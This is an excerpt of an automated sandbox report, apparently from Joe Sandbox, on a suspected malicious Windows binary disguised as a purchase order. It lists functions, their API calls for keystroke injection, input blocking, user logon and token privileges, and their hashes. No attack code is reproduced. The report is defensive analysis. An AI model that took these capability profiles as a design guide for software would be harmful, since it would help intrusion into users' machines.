                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetProcessId$kernel32.dll
                      • API String ID: 2574300362-399901964
                      • Opcode ID: 02ed7ea642128873aeba5e1b500ddf41cad84533e170bcbb78589a1c87255765
                      • Instruction ID: d5aba54f2a2ffcf78b1d86b880ffd7c03e027ce06d8d16e83497ff280c422e08
                      • Opcode Fuzzy Hash: 02ed7ea642128873aeba5e1b500ddf41cad84533e170bcbb78589a1c87255765
                      • Instruction Fuzzy Hash: 6DD0A7744403129FD7205FA5E80D75237E8EF04300B008469F749E2168DB70C480CB14
                      Function 00AD4342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00AD439C
                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00AD43B8
                      • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00AD4425
                      • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00AD4483
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: KeyboardState$InputMessagePostSend
                      • String ID:
                      • API String ID: 432972143-0
                      • Opcode ID: d827d414704bdaa39203aaf9f01f5ae54fc2272176b2e10bfd4092e0ccb84c2e
                      • Instruction ID: 65e9ffd7576f24b81cd6e6889531d451f489142b40338e1468a2a96299a8a922
                      • Opcode Fuzzy Hash: d827d414704bdaa39203aaf9f01f5ae54fc2272176b2e10bfd4092e0ccb84c2e
                      • Instruction Fuzzy Hash: 3641F2F1A00248ABEF208B659848BFDBBB5AB5D311F04415BF487973C1CB7489C59B62
                      Function 00AD220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00AD221E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: lstrlen
                      • String ID: ($|
                      • API String ID: 1659193697-1631851259
                      • Opcode ID: f36fdfea4fb0294cde6ff60b93ece1779248360c00feee6069e636a8fdad69da
                      • Instruction ID: 98ed8696a321bf73edfc82146d81fff7423f8ec32e99a046d98b940b151bf045
                      • Opcode Fuzzy Hash: f36fdfea4fb0294cde6ff60b93ece1779248360c00feee6069e636a8fdad69da
                      • Instruction Fuzzy Hash: 3A321475A007059FCB28CF69C480AAAB7F0FF58320B15C56EE49ADB7A1E770E941CB44
                      Function 00AAAD5C Relevance: 4.9, APIs: 3, Instructions: 378COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00AAAE5E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: LongProcWindow
                      • String ID:
                      • API String ID: 3265722593-0
                      • Opcode ID: aed90df63eee2fada9648deb9731ded3987f3dcb31a63c70da72939f9abd4a1c
                      • Instruction ID: 1d22a91ee37e1bd3a85429698f554e045bc37f91b65c9fa61ea93b91db895170
                      • Opcode Fuzzy Hash: aed90df63eee2fada9648deb9731ded3987f3dcb31a63c70da72939f9abd4a1c
                      • Instruction Fuzzy Hash: DFA10570204216BEDB38AB298D88EBF39EDEB67751B10456EF502D75E2DB258C01D273
                      Function 00AE550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                      Download Yara Rule
                      APIs
                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00AE4A1E,00000000), ref: 00AE55FD
                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00AE5629
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Internet$AvailableDataFileQueryRead
                      • String ID:
                      • API String ID: 599397726-0
                      • Opcode ID: a0affccd7b63b3663737cb6aeafd1f083a2ec2a43f8817d6a7b134dfe7596bba
                      • Instruction ID: 49ec9dc6559877161e91bf8ffdb34fdabe4d68020e3f8c3b86cfcea34a4fa620
                      • Opcode Fuzzy Hash: a0affccd7b63b3663737cb6aeafd1f083a2ec2a43f8817d6a7b134dfe7596bba
                      • Instruction Fuzzy Hash: 1E410571D00A49BFEB109FA6ED85EBFB7BDEB4071CF14401AF605A7181DA709E419B60
                      Function 00ADEA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00ADEA95
                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00ADEAEF
                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00ADEB3C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorMode$DiskFreeSpace
                      • String ID:
                      • API String ID: 1682464887-0
                      • Opcode ID: f03a675e613f4ae3cee42306b64b2482dc8baaf9e752e3ed43528383147882a4
                      • Instruction ID: e06e1482fd39e7a770768be8b23c94095bf74fc49c2682a3f83f6602a785c2b9
                      • Opcode Fuzzy Hash: f03a675e613f4ae3cee42306b64b2482dc8baaf9e752e3ed43528383147882a4
                      • Instruction Fuzzy Hash: 6C215E35A00218EFCB00EFA5D995AEDBBF8FF49310F14849AE806AB351DB35E915CB50
                      Function 00AD70AE Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AD70D8
                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00AD7115
                      • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AD711E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CloseControlCreateDeviceFileHandle
                      • String ID:
                      • API String ID: 33631002-0
                      • Opcode ID: c1026324e098b80a35341a27c9f5362b29340223800cba4e5415f69f6029ff01
                      • Instruction ID: d32c8b878484698c88a2aa550bb5c6ecc949ec0e00d376496c9611fc2df775ea
                      • Opcode Fuzzy Hash: c1026324e098b80a35341a27c9f5362b29340223800cba4e5415f69f6029ff01
                      • Instruction Fuzzy Hash: 4E11A5B1900229BEE7108BA8DC45FEFB7BCEB08714F404656B901F72A0D6B49E0487E1
                      Function 00A96670 Relevance: 4.1, APIs: 2, Instructions: 1093COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 72a24b7a2e7163179f9035deca2ebbe289b34cd2219913959bdd873ba2b9dfca
                      • Instruction ID: 2e92734ad194dd170fea6e21118d441def59ebe4d44288ea974b3248588099d3
                      • Opcode Fuzzy Hash: 72a24b7a2e7163179f9035deca2ebbe289b34cd2219913959bdd873ba2b9dfca
                      • Instruction Fuzzy Hash: BEA22575E00219DBCF24CF58C8806ADBBF1FF48314F6581AAE859AB390D7749E91DB90
                      Function 00A9DCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 51f81d92b6d8425068015a34ee78aa520c339f5e986a3c8386338bf4c2a9e4da
                      • Instruction ID: c64d428ce48ed47206e06e8a6c8d5ea6dce93f9f0dcffc3c2790c23851f5082b
                      • Opcode Fuzzy Hash: 51f81d92b6d8425068015a34ee78aa520c339f5e986a3c8386338bf4c2a9e4da
                      • Instruction Fuzzy Hash: 6622AE74A00216DFDF24DF58C491BAABBF0FF19300F148169E8969B392E771AD85CB91
                      Function 00ADFD47 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 00ADFD71
                      • FindClose.KERNEL32(00000000), ref: 00ADFDA1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Find$CloseFileFirst
                      • String ID:
                      • API String ID: 2295610775-0
                      • Opcode ID: 08b3987930de1124262dfa137d038cf927e1f583c36cf9d1c155e6ee527ea58e
                      • Instruction ID: 81f8ad2e51655737f6df2bfac7ba274f620693061aa46ac3a7144cb8e0a061cd
                      • Opcode Fuzzy Hash: 08b3987930de1124262dfa137d038cf927e1f583c36cf9d1c155e6ee527ea58e
                      • Instruction Fuzzy Hash: C711D6316102019FD700DF28C945A2AF7E9FF85324F00851EF8A6DB391DB34ED158B81
                      Function 00ADD712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00AEC2E2,?,?,00000000,?), ref: 00ADD73F
                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00AEC2E2,?,?,00000000,?), ref: 00ADD751
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorFormatLastMessage
                      • String ID:
                      • API String ID: 3479602957-0
                      • Opcode ID: ac1b6b6118ccdb79e1ffd2b78b38df7c8f349e76a9e4a044ec497c6044e17f8a
                      • Instruction ID: 421dc574983f373adf1382684e7c4ea3b39f150898885f0123d1fab586a94fe1
                      • Opcode Fuzzy Hash: ac1b6b6118ccdb79e1ffd2b78b38df7c8f349e76a9e4a044ec497c6044e17f8a
                      • Instruction Fuzzy Hash: 2DF08C3510032DABDB21AFA4CC49FEA7BADAF493A1F008156B91AD7181D6709A40CBA0
                      Function 00AD4B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00AD4B89
                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00AD4B9C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: InputSendkeybd_event
                      • String ID:
                      • API String ID: 3536248340-0
                      • Opcode ID: a51c5ff87ce81378cfecdcbf6027837b56daf375d4de3f345a841830da2e8eb2
                      • Instruction ID: b9fd87150471da4d2176f171b5f3234ba8fe108d90788de59e42fe77b696c89d
                      • Opcode Fuzzy Hash: a51c5ff87ce81378cfecdcbf6027837b56daf375d4de3f345a841830da2e8eb2
                      • Instruction Fuzzy Hash: 42F01D7090434DAFDB058FA5C805BBE7BB4AF14305F04C40AF955A6291D779C6159F94
                      Function 00ACB8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00ACB9EC), ref: 00ACB8C5
                      • CloseHandle.KERNEL32(?,?,00ACB9EC), ref: 00ACB8D7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AdjustCloseHandlePrivilegesToken
                      • String ID:
                      • API String ID: 81990902-0
                      • Opcode ID: ab206e182ad67e886b96238e6db950cb4acd16b6f347b29670ff33ea66a19cb9
                      • Instruction ID: c703ca4f6398407495c633f34de5e2856e449762f65545a13ed16b5fdef61f3a
                      • Opcode Fuzzy Hash: ab206e182ad67e886b96238e6db950cb4acd16b6f347b29670ff33ea66a19cb9
                      • Instruction Fuzzy Hash: A1E0B672014611AEE7262B64FD09DB77BEDEF08311B11C929F49682471DB62AC90DB10
                      Function 00AB8E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,00A9125D,00AB7A43,00A90F35,?,?,00000001), ref: 00AB8E41
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00AB8E4A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 7ee4ee3016e1c8ce53920bf499f65ed640a3f359f174af64936cf181d916d132
                      • Instruction ID: 0a2f519658063e377239753cdaf68f5dd3ba06571924ff205d1add3dcd942e01
                      • Opcode Fuzzy Hash: 7ee4ee3016e1c8ce53920bf499f65ed640a3f359f174af64936cf181d916d132
                      • Instruction Fuzzy Hash: FFB09271044A08ABEA002BA1FC09BC83F78EB08A62F808010F62D46060CF6354508A9A
                      Function 00AA3680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID:
                      • API String ID: 3964851224-0
                      • Opcode ID: 2b28f0812ca77073735592d67f932c752ae7aa4a3c4dfdf9cfb249575d648bae
                      • Instruction ID: 46bbf7de41bbf9e45cb3ce4ee2732e3c9760783d3b37c43abf4a04d7cb31f994
                      • Opcode Fuzzy Hash: 2b28f0812ca77073735592d67f932c752ae7aa4a3c4dfdf9cfb249575d648bae
                      • Instruction Fuzzy Hash: 6A9266716083419FDB24DF18C580B6ABBF0BF89304F14899DF98A8B2A2D775ED45CB52
                      Function 00AC113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 96e724d42ecc4ef5b946502ac56e706b206c3754894f134d4587f8184bcdb65d
                      • Instruction ID: 6ae55884aa5d8c46373ceb529d11c3d855a50f23ae4f833510b44d739e7841f5
                      • Opcode Fuzzy Hash: 96e724d42ecc4ef5b946502ac56e706b206c3754894f134d4587f8184bcdb65d
                      • Instruction Fuzzy Hash: 3EB1CF20E2AF404DD63396398831337B65CAFBB2D5F92D71BFC6A75D62EB2185834180
                      Function 00AE703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • BlockInput.USER32(00000001), ref: 00AE7057
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BlockInput
                      • String ID:
                      • API String ID: 3456056419-0
                      • Opcode ID: e4f7cd30a652f021ca9192e4b505fa1322d37307959a8753ec135ae7bf42c922
                      • Instruction ID: ff4cf8c11ccac603847894b82a3b54a94a9ea2db0a36a875b1645adfe62716aa
                      • Opcode Fuzzy Hash: e4f7cd30a652f021ca9192e4b505fa1322d37307959a8753ec135ae7bf42c922
                      • Instruction Fuzzy Hash: 04E048353042045FD710EFA9D504E9AF7ECAF54750F00C426F945D7251DAB0E8009BA0
                      Function 00AD7DD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                      Download Yara Rule
                      APIs
                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00AD7DF8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: mouse_event
                      • String ID:
                      • API String ID: 2434400541-0
                      • Opcode ID: 90ea0c71edb6de1ab0a17d8acf7e563cc594c25f26d2bcbf6b3dac3ad3811a4d
                      • Instruction ID: f064db862ad288dfc3299ae0e23f29ecb2dacf523dc222f72935a685071d7aa1
                      • Opcode Fuzzy Hash: 90ea0c71edb6de1ab0a17d8acf7e563cc594c25f26d2bcbf6b3dac3ad3811a4d
                      • Instruction Fuzzy Hash: FAD017A816C20669E91C07209C2FF7E211AEB00780FE0824BB4C3862C1FC9068005824
                      Function 00ACBE95 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                      Download Yara Rule
                      APIs
                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00ACBA6A), ref: 00ACBEB3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
